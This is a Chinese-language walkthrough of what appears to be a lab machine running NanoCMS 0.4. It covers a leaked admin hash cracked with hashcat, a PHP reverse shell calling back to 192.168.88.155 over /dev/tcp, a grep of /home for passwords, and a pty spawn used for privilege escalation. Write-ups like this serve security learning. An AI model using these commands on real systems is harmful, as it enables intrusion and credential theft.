打开web页面
在web页面中发现了NanoCMS
searchsploit扫描cms
有一个0.4版本的远程代码执行,但需要凭据才可以执行。目前没有凭据还无法使用
在谷歌搜索nanocms0.4
发现存在信息泄露文件
发现其中存在账号密码
admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd"
破解一下密码
最可能为md5
使用hashcat破解
sudo hashcat -m 0 -a 0 9d2f75377ac0ab991d40c91fd27e52fd /usr/share/wordlists/rockyou.txt
md5破解为:shannon
在Admin login中尝试登录
登录成功。既然登陆成功,那之前的cms远程代码执行也可以利用
登录页面中存在新建页面
及本身的页面
利用一下本身存在的页面,尝试对内容进行修改
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.155/1234 0>&1'");?>
kali开启监听,运行代码尝试
建立成功!!
apache用户,权限很低,给的内容很有限。
用户很多,但给了bash环境能利用的很少
mysql虽然分配了bash环境但利用的可能性不大。cyrus是一个imap服务器利用可能性也不大。
用户比较多的情况下,提权就要考虑能不能在本机上搜索到历史记录
grep -R -i pass /home/* 2>/dev/null
-R:递归,一层一层去搜
-i:忽略大小写
/home/*:因为是用户所以在home目录下去搜索
2>/dev/null:因为当前用户权限不高,所以将错误信息扔掉
先搜索pass关键词,不合适再换其他的
这是我们登录nanocms用到的凭据
在最后发现了Patrick的note文件,用户也有bash环境,查看一下这个文件
发现存在50$cent
尝试提权但回显缺少tty终端,所以我们要给一个虚拟终端pty
python -c "import pty;pty.spawn('/bin/sh')"
输入密码提权成功!!!